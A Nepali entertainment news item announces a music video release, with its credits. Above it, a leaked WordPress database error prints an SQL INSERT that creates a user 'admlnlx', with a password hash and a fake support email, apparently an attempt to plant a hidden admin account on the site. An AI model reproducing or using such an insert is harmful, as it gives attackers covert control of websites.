WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJCD5ijTbD1tN2QarsX/69mm4LgnBG/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 06:39:33', '', 'admlnlx', 'admlnlx')
काठमाण्डौ–२५, मंसिर । गोबिन्द तामाङको केहि त ईशारा देउ बोलको म्युजिक भिडियो सार्वजनिक भएको छ ।
गितमा दिपक बराईलीले संगित भरेका छन । स्वर बराईली र प्राश्ना साक्यको रहेकोछ भने संगित संयोजन देबेन्द्र नेवाले गरेका छन् । भिडियो शनिबार ओएसआर डिजिटल युटुब च्यानल मार्फत सार्वजनि गरिएको छ ।
गाउँले इन्टरटेनमेन्ट मिडिया ग्रुपको ब्यानरमा निर्माण भएको भिडियोमा केही सट मुभी र भिडियोमा अभिनय गरिसकेका बिकाश श्रेष्ठ र मेलिना तामाङले फिचरिङ गरेका छन् भने निर्देशन, छयाँङकन र सम्पादन गंगाराम राईले गरेका छन् ।